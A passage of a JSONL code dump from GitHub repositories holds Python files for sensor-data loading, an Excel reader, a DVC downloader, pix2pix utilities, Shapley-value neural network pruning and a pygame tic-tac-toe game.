file_data[row_num] = row[0].split('\\t')\n del file_data[row_num][-1]\n for i in range(len(file_data[row_num])):\n file_data[row_num][i] = float(file_data[row_num][i])\n row_num += 1\n# print file_data\n self.files_data.append(file_data)\n\n \n def read_in_files(self, file_path=\"\"):\n \"\"\"\n file_path: Folder containing data files\n \"\"\"\n files = []\n for i in range(8):\n files.append(file_path + \"/direction_\" + str(i+1) + \".tsv\")\n for file in files:\n self.read_in_file(file)\n \n def get_feature(self, feature_func, slice_range=[23, 28]):\n \"\"\"\n \"\"\"\n for file_data in self.files_data:\n feature_func(file_data, slice_range)\n# print self.feature\n \n def slice_avg(self, file_data, slice_range):\n \"\"\"Calculate the average value of a slice of the data\n \"\"\"\n row_num = 0\n feature_data = [0] * 7\n for row in file_data:\n feature_data[row_num] = sum(row[slice_range[0]:slice_range[1]]) / (slice_range[1] - slice_range[0])\n row_num += 1\n self.feature.append(feature_data)\n \n#tsv_file = LoadSensorTsvFile()\n#tsv_file.read_in_files('050801_yangguang')\n#tsv_file.get_feature(tsv_file.slice_avg)\n","repo_name":"nealyang2017/yang20170715","sub_path":"LoadSensorTsvFile.py","file_name":"LoadSensorTsvFile.py","file_ext":"py","file_size_in_byte":1759,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"17566990529","text":"def even_odd(*args):\n command = args[-1]\n nums = []\n if command=='even':\n for i in args[:-1]:\n if i % 2 == 0:\n nums.append(i)\n return nums\n elif command == 'odd':\n for i in args[:-1]:\n if i % 2 != 0:\n nums.append(i)\n return nums\n\n\nprint(even_odd(1, 2, 3, 4, 5, 6, \"even\"))\nprint(even_odd(1, 2, 3, 4, 5, 6, 7, 8, 9, 10, \"odd\"))","repo_name":"ilias511/Advanced","sub_path":"Functions_Advanced/Even or Odd.py","file_name":"Even or Odd.py","file_ext":"py","file_size_in_byte":418,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"19825449823","text":"import os\n\nfrom dvc.api import DVCFileSystem\n\n\ndef main(config):\n if os.path.isdir(f\"./data/{config.dataset}\"):\n print(f\"The folder \\\"{config.dataset}\\\" exists\")\n else:\n print(\"Dataset download begins\")\n url = \"https://github.com/Natalka-Pro/myops_tools.git\"\n fs = DVCFileSystem(url, rev=\"main\")\n fs.get(\"./data\", \"./\", recursive=True)\n print(\"Dataset download completed\")\n","repo_name":"Natalka-Pro/MYopsTools","sub_path":"myops_tools/download.py","file_name":"download.py","file_ext":"py","file_size_in_byte":421,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"11770180415","text":"\"\"\"\n*****************************************************************************\n Reads an excel file, extracts the information and store them in\n an organized list which contains a tuple of the information in each\n row in our excel file\n*****************************************************************************\n\"\"\"\nimport openpyxl\n\n\nclass ExcelReader:\n \"\"\"Creates a constructor of our class\"\"\"\n def __init__(self, excel_doc):\n self._excel_doc = excel_doc\n self._sheet = None\n\n # Gets the required sheet to extract our data\n def required_sheet(self, active_sheet):\n excel_doc = openpyxl.load_workbook(self._excel_doc)\n r_sheet = excel_doc[active_sheet]\n self._sheet = r_sheet\n\n # Extracts the data store them in a list\n def extract_data_to_list(self):\n # extracts the raw data and keep in 
a list\n list_data = list()\n for row in self._sheet.iter_rows():\n prime_list = list()\n for cell in row:\n prime_list.append(cell.value)\n list_data.append(prime_list)\n return list_data\n\n # contains the well formatted data in the form a tuple (name, email_address)\n def email_info(self):\n email_info_list = list()\n data = self.extract_data_to_list()\n for i in range(1, len(data)):\n info = [data[i][0], data[i][1]]\n email_info_list.append(tuple(info))\n return email_info_list\n","repo_name":"mofirojean/Emailer_using_python","sub_path":"emailer_excel_reader.py","file_name":"emailer_excel_reader.py","file_ext":"py","file_size_in_byte":1459,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"32185486180","text":"import torch\nimport torchvision\n\ndef save_some_examples(gen, val_loader, epoch, device):\n x, y = next(iter(val_loader))\n x, y = x.to(device).squeeze(1), y.to(device).squeeze(1)\n gen.eval()\n with torch.no_grad():\n _, y_fake = gen(x)\n y_fake = y_fake * 0.5 + 0.5 # remove normalization\n torchvision.utils.save_image(y_fake, f\"/y_gen_{epoch}.png\")\n torchvision.utils.save_image(x * 0.5 + 0.5, f\"/input_{epoch}.png\")\n if epoch == 1:\n torchvision.utils.save_image(y, f\"/label_{epoch}.jpg\")\n gen.train()\n\ndef save_checkpoint(model, optimizer, filename=\"my_ckpt.pth\"):\n print(\"=> saving checkpoint...\")\n checkpoint = {\n \"state_dict\": model.state_dict(),\n \"optimizer\": optimizer.state_dict(),\n }\n torch.save(checkpoint, filename)\n\ndef load_checkpoint(checkpoint_file, model, optimizer, lr, device):\n print(\"=> loading checkpoint...\")\n checkpoint = torch.load(checkpoint_file, map_location=device)\n model.load_state_dict(checkpoint[\"state_dict\"])\n optimizer.load_state_dict(checkpoint[\"optimizer\"])\n\n for param_group in optimizer.param_groups:\n param_group[\"lr\"] = lr\n\n","repo_name":"yotamraz/LootedArt","sub_path":"pix2pix/utils/general.py","file_name":"general.py","file_ext":"py","file_size_in_byte":1169,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"19138006949","text":"#from models.lenet5 import Lenet\nimport torch\nimport numpy as np\nfrom itertools import chain, combinations\nimport os\nfrom sklearn.linear_model import LinearRegression\nfrom collections import OrderedDict\nfrom operator import itemgetter\n\ndevice = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n\ndef oracle(dic, size, nodenum, adding):\n\n #smaller values means this set (which is zeroed out) bring highest loss\n keys = list(dic.keys())\n if adding:\n mm = [i for i in keys if len(i) == nodenum - size]\n else:\n mm = [i for i in keys if len(i) == size]\n\n lal = {k: dic[k] for k in mm}\n d_rev = OrderedDict(sorted(lal.items(), key=itemgetter(1), reverse=True))\n\n d_keys = list(d_rev)\n d_values = list(d_rev.values())\n\n # we take the complement of the set\n # adding. 
we take biggest\n if adding:\n d_keys_comp = []\n for key in range(len(d_keys)):\n comp = set(np.arange(nodenum)) - set(d_keys[key])\n d_keys_comp.append(comp)\n\n return d_keys_comp[:5], d_values[:5]\n\n # removing, we take smallest, removing hurts the accuracy\n else: # best to remove\n return d_keys[:5], d_values[:5]\n\n\ndef oracle_get(dic, param, rank):\n # oracle\n print(\"\\nOracle adding\\n\") # adding means its loss is the biggest when removing just one\n good = 0; total = 0\n for o in range(1, 6):\n # get the best set of size o\n set_oracle, val_oracle = oracle(dic, o, param.shape[0], True)\n print(f\"\\nOracle best to add for {param.shape[0] - o}:\")\n print(set_oracle, val_oracle)\n ora = set(list(set_oracle[:o][0]))\n ran = set(rank[:o])\n inter = ora.intersection(ran)\n good += len(inter); total += len(ran)\n print(f\"Acc add: {good/float(total)}\")\n print(\"\\nOracle removing\\n\")\n good = 0; total = 0\n for o in range(1, 6):\n set_oracle, val_oracle = oracle(dic, o, param.shape[0], False)\n print(f\"\\nOracle best to remove for {o}:\")\n print(set_oracle, val_oracle)\n ora = set(list(set_oracle[:o][0]))\n ran = set(rank[-o:])\n inter = ora.intersection(ran)\n good += len(inter)\n total += len(ran)\n print(f\"Acc remove: {good / float(total)}\")\n\n\ndef shapley_rank(evaluate, net, net_name, checkpoint_name, dataset, file_load, k_num, method, sample_num, adding, layer=\"None\", criterion=\"dummy\", args=None, path=None):\n path_file = \"sv/Lenet/combin\"\n print(\"Computing Shapley rank in two stages\")\n print(f\"Shapley method: {method}\")\n # just to check the original accuracy without any pruning\n if net_name == \"Resnet50\":\n acc = 76.13\n #acc = evaluate(dataset, net, criterion, args) # dataset is the val_loader\n elif net_name == \"resnet\": # from grad_drop\n acc = evaluate(net, dataset)\n else:\n acc = evaluate(net, \"test\")\n # compute combinations / the characteristic function\n if path is None:\n path = f\"../methods/sv/{net_name}/{method}\"\n os.makedirs(path, exist_ok=True)\n shap_ranks = []; shap_ranks_dic = {}\n\n for layer_name, param in net.named_parameters():\n # for a particular layer indicated in args\n if layer != \"None\":\n if layer == layer_name:\n pass\n else:\n continue\n print(layer_name)\n\n if \"weight\" in layer_name and \"bn\" not in layer_name and \"out\" not in layer_name:\n #if \"weight\" in layer_name and \"bn\" not in layer_name and \"out\" not in layer_name and \"fc\" in layer_name: #remove after cvpr2022\n if \"Resnet\" not in net_name or (\"Resnet\" in net_name and (\"layer\" in layer_name or \"fc\" in layer_name or layer_name == \"module.conv1.weight\")):\n #if \"Resnet\" not in net_name or (\"Resnet\" in net_name and \"fc\" in layer_name):\n\n print(\"Layer: \", layer_name)\n global file_name, file_name_new, file_name_old\n file_name = f\"{path}/{method}_pruning_{checkpoint_name}_{layer_name}\"\n file_name_new = file_name + \"_new.txt\"\n file_old = file_name + \".txt\"\n file_name_old = file_name + \".txt\"\n if not os.path.isfile(file_name_old):\n with open(file_name_old, \"a+\") as f:\n f.write(str(param.shape[0]) + \"\\n\")\n\n if method == \"kernel\":\n if not file_load: # kernshap writes the results to file\n shap_arr = kernshap(True, net, net_name, layer_name, evaluate, dataset, k_num, param, sample_num, \"zeroing\", args, criterion)\n dic, nodes_num = readdata_notsampled(file_old, acc)\n print(f\"Read from {file_old}\")\n print(f\"Number of samples: {len(dic.keys())}\")\n\n reg = LinearRegression().fit(list(dic.keys())[1:], 
list(dic.values())[1:])\n shap_arr = reg.coef_\n shap_arr=-1*shap_arr\n print(\"shaps\\n\", shap_arr)\n\n if method == \"random\":\n if not file_load:\n randomshap(True, net, net_name, checkpoint_name, layer_name, evaluate, dataset, k_num, param, sample_num, \"zeroing\")\n shap_arr = readdata_notsampled_random(file_old, acc)\n print(\"shaps\\n\", shap_arr)\n #shap_arr = file_read(\"random\", net_name, checkpoint_name, layer_name)\n\n if method == \"combin\":\n if not file_load:\n compute_combinations_lenet(True, net, net_name, layer_name, evaluate, dataset, k_num, \"zeroing\")\n dic, nodes_num = readdata_notsampled_combin(file_name_new, acc)\n #k_num=1; adding=False\n print(f\"\\nExact partial for {k_num} and adding: {adding}\")\n shap_arr = exact_partial(dic, nodes_num, acc, adding, k_num)\n la=np.argsort(shap_arr)[::-1]\n print(\",\".join(map(str, la)))\n\n shap_rank = np.argsort(shap_arr)[::-1]\n print(shap_rank)\n shap_ranks.append(shap_rank)\n shap_ranks_dic[layer_name]=shap_rank\n\n #get oracle\n file_name = f\"../methods/sv/{net_name}/combin/combin_pruning_{checkpoint_name}_{layer_name}\"\n file_name_new = file_name + \"_new.txt\"\n\n\n # compute the intersection of the rank selected above and the oracle set\n # maybe commented on the server\n if os.path.isfile(file_name_new):\n dic, nodes_num = readdata_notsampled_combin(file_name_new, acc)\n oracle_get(dic, param, shap_rank)\n\n\n return shap_ranks, shap_ranks_dic\n\n\n# def file_read_npy(meth, net_name, checkpoint_name, layer):\n# if meth==\"random\":\n# samples_most=0\n# for fname in os.listdir(f'../methods/sv/{net_name}/{meth}'):\n# core_name = f\"{meth}shap_{checkpoint_name}_{layer}_samp_\"\n# if core_name in fname:\n# samp_num_temp = fname.replace(core_name, \"\")\n# samp_num = samp_num_temp.replace(\".npy\", \"\")\n# samples_num = int(samp_num)\n# if samples_num>samples_most:\n# samples_most = samples_num\n# #loading file\n# path_meth = f\"../methods/sv/{net_name}/{meth}/{meth}shap_{checkpoint_name}_{layer}_samp_{samples_most}.npy\"\n# randsvs = np.load(path_meth)\n# print(f\"Loaded {meth} Shapley file from {path_meth}\")\n# return randsvs\n\n\ndef file_check(method):\n if method==\"combin\":\n # check if new results have more lines than the previous one\n file_old = file_name + \".txt\"\n file_new = file_name + \"_new.txt\"\n if os.path.exists(file_old):\n num_lines_old = sum(1 for line in open(file_old, \"r\"))\n num_lines_new = sum(1 for line in open(file_new, \"r\"))\n # if num_lines_old > num_lines_new:\n # os.remove(file_new)\n # else:\n # os.remove(file_old)\n # os.rename(file_new, file_old)\n else:\n os.rename(file_new, file_old)\n\n\n# taken form ranking/results_compression/lenet_network_pruning_withcombinations.py\ndef compute_combinations_lenet(file_write, net, net_name, layer, evaluate, dataset, k_num, perturbation_method):\n print(\"1. 
Computing combinations\")\n\n acc = evaluate(net, \"test\")\n print(\"from other\")\n # for name, param in net.named_parameters():\n # print(name)\n for name, param in net.named_parameters():\n print(\"Working on the layer: \", layer)\n # find a layer (weight and bias) where we compute rank\n\n if layer in name:\n if file_write:\n with open(file_name_new, \"a+\") as textfile:\n textfile.write(str(param.shape[0])+\"\\n\")\n if \"Resnet\" not in net_name:\n layerbias = layer[:-6] + \"bias\" #:3 for lenet\n params_bias = net.state_dict()[layerbias]\n all_results = {}\n # get s and r to compute the (s choose r)\n s = torch.arange(0, param.shape[0]) # list from 0 to 19 as these are the indices of the data tensor\n # get the alternating elements in the channel list to have the most combinations from the beginning and end first\n a = np.arange(0, param.shape[0]+1)\n channel_list = [a[-i // 2] if i % 2 else a[i // 2] for i in range(len(a))]\n channel_list=channel_list[:] if k_num==None else channel_list[:k_num]\n #for r in range(1, param.shape[0]): # produces the combinations of the elements in s\n for r in channel_list:\n print(r)\n results = []\n for combination in list(combinations(s, r)):\n combination = torch.LongTensor(combination)\n #print(combination)\n # save current values in a placeholder\n params_saved = param[combination].clone();\n if \"Resnet\" not in net_name:\n param_bias_saved = params_bias[combination].clone()\n # zero out a subset of the channels\n if perturbation_method == \"zeroing\":\n\n\n ## param[combination] = 0\n ## if net_name is not \"Resnet\":\n ## params_bias[combination] = 0\n ## accuracy = evaluate(net, \"val\")\n\n # add noise to subset of channels (experimental feature)\n # elif perturbation_method == \"additive_noise\":\n # # norm_dist=torch.distributions.Normal(0,0.1)\n # # param[combination[0]] += norm_dist.sample(param[combination[0]].shape).to(device)\n # # multiplying by noise\n # # norm_dist = torch.distributions.Normal(1, 0.1)\n # # param[combination[0]] *= norm_dist.sample(param[combination[0]].shape)\n # # adding noise\n # accuracies = []\n # for i in range(5):\n # norm_dist = torch.distributions.Normal(0, 0.1)\n # param[combination[0]] += norm_dist.sample(param[combination[0]].shape)\n # accuracies.append(evaluate())\n # accuracy = np.mean(accuracies)\n # print(\"Averaged accuracy: \", accuracy)\n ########################################333\n # accuracy = evaluate(net)\n\n ##param.data[combination] = params_saved\n ##if net_name is not \"Resnet\":\n ## params_bias.data[combination] = param_bias_saved\n\n accuracy = check_combination(net, net_name, combination, param, evaluate, params_bias)\n\n\n results.append((combination, accuracy))\n # write the combinations to the file\n if file_write:\n with open(file_name_new, \"a+\") as textfile:\n textfile.write(\"%s: %.2f\\n\" % (\",\".join(str(x) for x in combination.numpy()), accuracy))\n\n all_results[r] = results\n file_check(\"combin\")\n\n\ndef exact_partial(dic, nodesNum, original_acc, adding, K_param=0):\n #minus means actually plus because we remove it from the list of 0s, so add to the list of non-zeros\n #dic[tuple(np.arange(nodesNum))] = 10 #random accuracy of no all zeros\n dic[()] = original_acc\n m = list(dic.keys())\n m.sort(key=lambda t: len(t), reverse=True)\n\n shaps = np.zeros(nodesNum)\n shaps_samps = np.zeros(nodesNum)\n N = nodesNum\n for elem in m:\n val1 = dic[elem]\n #print(\"el: \", elem, \"val: \", val1)\n if len(elem) == 1:\n mama = 0\n elem_set = set(elem)\n if adding:\n thresh = 
(nodesNum - K_param)\n else:\n thresh = K_param\n for i in elem:\n elem_set.remove(i)\n elem_plus = tuple(elem_set)\n K = len(elem_plus)\n if (K >= thresh and adding) or (K+1 <= thresh and not adding):\n #if K > 1 and tuple(elem_plus) in m:\n if tuple(elem_plus) in m:\n val2 = dic[elem_plus] - val1\n # elif len(elem_plus)==1:\n # val2 = dic[elem_plus]\n #print(\"i: \", i, \"val2: \", val2, \"el: \", elem_plus, \"val: \", dic[elem_plus])\n\n coeff = np.math.factorial(N-K-1) * np.math.factorial(K)\n shaps[i] += val2 * coeff\n shaps_samps[i] += 1\n elem_set.add(i)\n\n svs = np.divide(shaps, np.math.factorial(N))\n print(\"svs\", svs)\n return svs\n\n\n\ndef check_combination(net, net_name, combination, param, evaluate, params_bias, args=None, criterion=None, loader=None):\n combination = torch.LongTensor(combination)\n print(combination)\n params_saved = param[combination].clone()\n if \"Resnet\" not in net_name and \"resnet\" not in net_name:\n param_bias_saved = params_bias[combination].clone()\n\n #param[combination[0]] = 0\n param.data[combination] = 0\n #print(\"Sum:\\n \", torch.sum(param, axis=(1, 2, 3)))\n if \"Resnet\" not in net_name and \"resnet\" not in net_name:\n params_bias[combination] = 0\n\n if net_name != \"Resnet50\" and \"resnet\" not in net_name: # resnet50\n accuracy = evaluate(net, \"val\")\n elif \"resnet\" in net_name:\n accuracy = evaluate(net, loader)\n else:\n accuracy = evaluate(loader, net, criterion, args)\n\n param.data[combination] = params_saved\n if \"Resnet\" not in net_name and \"resnet\" not in net_name:\n params_bias.data[combination] = param_bias_saved\n\n return accuracy\n\ndef write_file(file_write, comb, acc):\n if file_write:\n with open(file_name_old, \"a+\") as textfile:\n textfile.write(\"%s: %.2f\\n\" % (\",\".join(str(x) for x in comb), acc))\n print(f\"Saved in {file_name_old}\")\n\ndef kernshap(file_write, net, net_name, layer, evaluate, dataset, k_num, param, samples_num=10, perturbation_method=None, args=None, criterion=None):\n\n if \"Resnet\" not in net_name and \"resnet\" not in net_name:\n layerbias = layer[:-6] + \"bias\" #:3 for lenet\n params_bias = net.state_dict()[layerbias]\n else:\n params_bias = None\n\n # if file_write:\n # with open(file_name, \"a+\") as textfile:\n # textfile.write(str(param.shape[0])+\"\\n\")\n\n combinations_bin = np.zeros((samples_num, param.shape[0]))\n accuracies = np.zeros(samples_num)\n for i in range(samples_num):\n print(f\"samp: {i}\")\n randperm = np.random.permutation(param.shape[0])\n randint = 0\n while randint == 0:\n randint = np.random.randint(param.shape[0])\n randint_indextoremove = np.random.randint(randint)\n combination = randperm[:randint]\n combination2 = np.delete(combination, randint_indextoremove)\n print(combination[randint_indextoremove])\n\n acc = check_combination(net, net_name, combination, param, evaluate, params_bias, args, criterion, dataset)\n\n combinations_bin[i, combination] = 1\n accuracies[i] = acc\n\n write_file(file_write, combinations_bin[i], accuracies[i])\n\n #file_check()\n\n return\n\n\ndef randomshap(file_write, net, net_name, checkpoint_name, layer, evaluate, dataset, k_num, param, samples_num=10,\n perturbation_method=None):\n if \"Resnet\" not in net_name:\n layerbias = layer[:-6] + \"bias\" #:3 for lenet\n params_bias = net.state_dict()[layerbias]\n else:\n params_bias = None\n\n acc_val = evaluate(net, \"val\")\n\n shaps = np.zeros(param.shape[0])\n combinations_bin = np.zeros((samples_num, param.shape[0]))\n accuracies = np.zeros(samples_num)\n 
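# Monte Carlo Shapley estimate: for each sample, draw a random ordering of\n # the channels, zero out one more channel at a time, and credit each channel\n # with the accuracy drop it causes (its marginal contribution); the running\n # average over samples approximates the Shapley values.\n 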
for i in range(samples_num):\n print(f\"\\nSample num: {i}\")\n randperm = np.random.permutation(param.shape[0])\n last_acc = acc_val\n nums = []; marginals = [];\n for j in range(param.shape[0]):\n elem = randperm[j]\n print(f\"\\n\\nChannel marginal check: {elem}\")\n combination = randperm[:j+1]\n acc = check_combination(net, net_name, combination, param, evaluate, params_bias)\n marginal = last_acc - acc\n last_acc = acc\n shaps[elem]+= marginal\n\n nums.append(combination); marginals.append(acc)\n for k in range(len(nums)):\n write_file(file_write, nums[k], marginals[k])\n\n if i % 10 == 0 or i==samples_num-1:\n print(shaps)\n randsvs = shaps/(i+1)\n print(randsvs)\n print(np.argsort(randsvs)[::-1])\n #np.save(f\"../methods/sv/{net_name}/random/randomshap_{checkpoint_name}_{layer}_samp_{(i+1)}.npy\", randsvs)\n return randsvs\n\n\n\n# CHOOSES RANDOM COMBINATION and then removed one of the random nodes and computes accuracy for that node\n# from ranking/results_compression/network_pruning_withcombinstions.py\ndef compute_combinations_random(file_write, net, evaluate):\n for name, param in net.named_parameters():\n print(name)\n print(param.shape)\n layer = \"c5.weight\"\n # find a layer (weight and bias) where we compute rank\n\n if layer in name:\n layerbias = layer[:3] + \"bias\"\n params_bias = net.state_dict()[layerbias]\n while (True):\n\n all_results = {}\n # s=torch.range(0,49) #list from 0 to 19 as these are the indices of the data tensor\n # for r in range(1,50): #produces the combinations of the elements in s\n # results=[]\n randperm = np.random.permutation(param.shape[0])\n randint = 0\n while (randint == 0):\n randint = np.random.randint(param.shape[0])\n randint_indextoremove = np.random.randint(randint)\n combination = randperm[:randint]\n combination2 = np.delete(combination, randint_indextoremove)\n print(combination[randint_indextoremove])\n\n if file_write:\n with open(\"results_running/combinations_pruning_mnist_%s_%s.txt\" % (path[7:], layer), \"a+\") as textfile:\n textfile.write(\"%d\\n\" % randint_indextoremove)\n for combination in [combination, combination2]:\n # for combination in list(combinations(s, r)):\n combination = torch.LongTensor(combination)\n print(combination)\n params_saved = param[combination].clone()\n param_bias_saved = params_bias[combination].clone()\n # param[torch.LongTensor([1, 4])] = 0\n # workaround, first using multiple indices does not work, but if one of the change first then it works to use param[combinations]\n if len(combination) != 0:\n param[combination[0]] = 0\n # param[combination]=0\n params_bias[combination] = 0\n accuracy = evaluate()\n param.data[combination] = params_saved\n params_bias.data[combination] = param_bias_saved\n if file_write:\n with open(\"results_running/combinations_pruning_fashionmnist_%s_%s.txt\" % (path[7:], layer),\n \"a+\") as textfile:\n textfile.write(\"%s: %.2f\\n\" % (\",\".join(str(x) for x in combination.numpy()), accuracy))\n\n # all_results[r]=results\n\n # import pickle\n # filename='combinations_all_results_rel_bn_%d.pkl' % r\n # file=open(filename, 'wb')\n # pickle.dump(all_results, file)\n # file.close()\n\n\n#############################################3\n# copied from ranking/results_shapley/shapley.py\n\n# READ ONLY DATA\n# not sampled, we take all the combinations of size 1, then all the combinations of size 2, etc.\n\n# reads into dic 0,6 : 98.51\n# 6: 98.82\n# 7: 98.17\n# 8: 98.57\n# 9: 99.02\n# 0,1: 97.65\n# 0,2: 98.83\n# 0,3: 98.63\n# 0,4: 98.80\n\n\ndef 
readdata_notsampled_marginals(file, original_accuracy):\n f = open(file)\n dict = {(): 0}\n nodes_num = int(next(f)[:-1]) # number of points, first line of the file only\n shap = np.zeros(nodes_num)\n for i in range(nodes_num):\n dict[i] = []\n for line in f:\n linesplit = line.strip().split(\":\")\n tup = int(linesplit[0])\n acc = float(linesplit[1])\n #dict[tup] = original_accuracy - acc\n dict[tup].append(acc)\n #print(tup, acc)\n f.close()\n for m in range(nodes_num):\n shap[m] = np.average(dict[m])\n return shap\n\n\ndef readdata_notsampled(file, original_accuracy):\n f = open(file)\n nodes_num = next(f)[:-1] # number of points, first line of the file only\n #line = next(f)\n #linesplit = line.strip().split(\":\")\n #original_accuracy2 = float(linesplit[1])\n dict = {(): original_accuracy}\n for line in f:\n #print(line)\n linesplit = line.strip().split(\":\")\n tup = tuple(int(float(x)) for x in linesplit[0].split(\",\"))\n acc = float(linesplit[1])\n #dict[tup] = original_accuracy - acc\n dict[tup] = acc\n #print(tup, acc)\n f.close()\n return dict, int(nodes_num)\n\ndef readdata_notsampled_combin(file, original_accuracy):\n f = open(file)\n nodes_num = next(f)[:-1] # number of points, first line of the file only\n line = next(f)\n linesplit = line.strip().split(\":\")\n original_accuracy2 = float(linesplit[1])\n dict = {(): original_accuracy2}\n for line in f:\n #print(line)\n linesplit = line.strip().split(\":\")\n tup = tuple(int(float(x)) for x in linesplit[0].split(\",\"))\n acc = float(linesplit[1])\n #dict[tup] = original_accuracy - acc\n dict[tup] = acc\n #print(tup, acc)\n f.close()\n return dict, int(nodes_num)\n\n\ndef get_svs(dict, original_accuracy, nodes_num):\n shaps = np.zeros(nodes_num)\n for key in dict.keys():\n keyl = list(key)\n if len(keyl) == 0:\n #shaps[keyl[-1]] = original_accuracy - dict[key]\n old_key_val = dict[key]\n else:\n shaps[keyl[-1]] = old_key_val - dict[key]\n old_key_val = dict[key]\n return shaps\n\n\ndef readdata_notsampled_random(file, original_accuracy):\n f = open(file)\n nodes_num = int(next(f)[:-1]) # number of points, first line of the file only\n #line = next(f)\n #linesplit = line.strip().split(\":\")\n #original_accuracy2 = float(linesplit[1])\n i = 0\n dict = {(): original_accuracy}\n shaps = np.zeros(nodes_num)\n samps = 0\n for line in f:\n i += 1\n linesplit = line.strip().split(\":\")\n tup = tuple(int(float(x)) for x in linesplit[0].split(\",\"))\n acc = float(linesplit[1])\n #dict[tup] = original_accuracy - acc\n dict[tup] = acc\n #print(tup, acc)\n if i == int(nodes_num):\n i = 0\n samps += 1\n # compute the differences within one permutation from removing more and more nodes\n shaps_part = get_svs(dict, original_accuracy, nodes_num)\n shaps += shaps_part\n dict = {(): original_accuracy}\n\n shaps = shaps / samps\n f.close()\n return shaps\n\n\n#######################\n\n# SHAPLEY VALUE\n\n###########################################################\n# copied from ranking/results_shapley/shapley.py\n\n# sampled shapley, \"full\" perms\n# (in quotes because we may not have computed all the perms, but we compute them sequentially\n# to get all of them, e.g. 
all perms of size 1, all perms of size 2, etc\n\n# for each node we want to compute Shapley value:\n# we get a random permutation and find that node (we count the subset from the beginning up to that node)\n# remove it and chceck the difference if both the subsets are present\n\n# works on such dics\n# 8: 98.57\n# 9: 99.02\n# 0,1: 97.65\n# 0,2: 98.83\n# 0,3: 98.63\n\ndef shapley_samp(dict_passed, nodesnum, samples_num):\n print(\"Partial Random Shapley\")\n dict = dict_passed\n\n # permutations = list(itertools.permutations(elements))\n shap_array = []\n elements_num = nodesnum\n for elem in range(elements_num): # for each element we want to compute SV of\n sum = 0\n dict_elems = 0\n print(elem)\n for i in range(samples_num):\n perm = np.random.permutation(elements_num).tolist()\n # print(perm)\n # we look at all the permutations\n ind = perm.index(elem)\n del perm[ind + 1:]\n perm.sort()\n perm_tuple = tuple(perm)\n perm.remove(elem)\n removed_perm_tuple = tuple(perm)\n if perm_tuple in dict and removed_perm_tuple in dict:\n val = dict[perm_tuple] - dict[removed_perm_tuple]\n sum += val\n # print(val)\n dict_elems += 1\n # print(\"sum: %.2f, perms: %d\" % (sum,dict_elems))\n shap = sum / dict_elems\n print(\"shap: %.2f\" % shap)\n shap_array.append(shap)\n\n return shap_array\n","repo_name":"kamadforge/dirichlet_pruning","sub_path":"methods/shapley_rank.py","file_name":"shapley_rank.py","file_ext":"py","file_size_in_byte":26665,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"75"} +{"seq_id":"25326682812","text":"import pygame, sys, time, random\r\n\r\npygame.init()\r\nfps = 60\r\nxo = 'x'\r\nwidth = 400\r\nheight = 400\r\ngame_icon = pygame.image.load(\"images/game_icon.png\")\r\npygame.display.set_icon(game_icon)\r\nwinner = None\r\ndraw = False\r\nwhite = (255, 255, 255)\r\nline_color = (0, 0, 0)\r\nclock = pygame.time.Clock()\r\nttt = [[None] * 3, [None] * 3, [None] * 3]\r\nmode = None\r\n\r\npygame.display.set_caption('Tic Tac Toe')\r\nscreen = pygame.display.set_mode((width, height + 100), 0, 32)\r\n\r\nx_img = pygame.image.load('images/x.png')\r\no_img = pygame.image.load('images/o.png')\r\nhome_img = pygame.image.load('images/home.png')\r\nsinglePlayer = pygame.image.load('images/singlePlayer.png')\r\nmultiPlayer = pygame.image.load('images/multiPlayer.png')\r\n\r\nx_img = pygame.transform.scale(x_img, (80, 80))\r\no_img = pygame.transform.scale(o_img, (80, 80))\r\nhome_img = pygame.transform.scale(home_img, (width, height + 100))\r\nsinglePlayer = pygame.transform.scale(singlePlayer, (200, 200))\r\nmultiPlayer = pygame.transform.scale(multiPlayer, (170, 170))\r\n\r\n\r\ndef home_screen():\r\n global mode\r\n\r\n screen.blit(home_img, (0, 0))\r\n pygame.display.update()\r\n time.sleep(1)\r\n screen.fill(white)\r\n pygame.draw.line(screen, line_color, (0, 250), (width, 250), 7)\r\n screen.blit(singlePlayer, (100, 0))\r\n screen.blit(multiPlayer, (100, 300))\r\n pygame.display.update()\r\n\r\n\r\ndef main_screen():\r\n screen.fill(white)\r\n pygame.draw.line(screen, line_color, (width / 3, 0), (width / 3, height), 7)\r\n pygame.draw.line(screen, line_color, (width / 3 * 2, 0), (width / 3 * 2, height), 7)\r\n\r\n pygame.draw.line(screen, line_color, (0, height / 3), (width, height / 3), 7)\r\n pygame.draw.line(screen, line_color, (0, height / 3 * 2), (width, height / 3 * 2), 7)\r\n status()\r\n\r\n\r\ndef status():\r\n global draw\r\n if winner is None:\r\n message = xo.upper() + \"'s Turn\"\r\n else:\r\n message = winner.upper() + \" won 
!\"\r\n if draw:\r\n message = \"Game drawn !\"\r\n font = pygame.font.Font(None, 30)\r\n text = font.render(message, 1, (255, 255, 255))\r\n screen.fill((0, 0, 0), (0, 400, 500, 100))\r\n text_rect = text.get_rect(center=(width / 2, 500 - 50))\r\n screen.blit(text, text_rect)\r\n pygame.display.update()\r\n\r\n\r\ndef check_win():\r\n global ttt, winner, draw\r\n\r\n for row in range(0, 3):\r\n if ttt[row][0] == ttt[row][1] and ttt[row][1] == ttt[row][2] and ttt[row][0] is not None:\r\n winner = ttt[row][0]\r\n pygame.draw.line(screen, (250, 0, 0), (0, (row + 1) * height / 3 - height / 6), \\\r\n (width, (row + 1) * height / 3 - height / 6), 4)\r\n break\r\n\r\n for col in range(0, 3):\r\n if (ttt[0][col] == ttt[1][col] == ttt[2][col]) and (ttt[0][col] is not None):\r\n # this column won\r\n winner = ttt[0][col]\r\n # draw winning line\r\n pygame.draw.line(screen, (250, 0, 0), ((col + 1) * width / 3 - width / 6, 0), \\\r\n ((col + 1) * width / 3 - width / 6, height), 4)\r\n break\r\n if (ttt[0][0] == ttt[1][1] == ttt[2][2]) and (ttt[0][0] is not None):\r\n # game won diagonally left to right\r\n winner = ttt[0][0]\r\n pygame.draw.line(screen, (250, 70, 70), (50, 50), (350, 350), 4)\r\n if (ttt[0][2] == ttt[1][1] == ttt[2][0]) 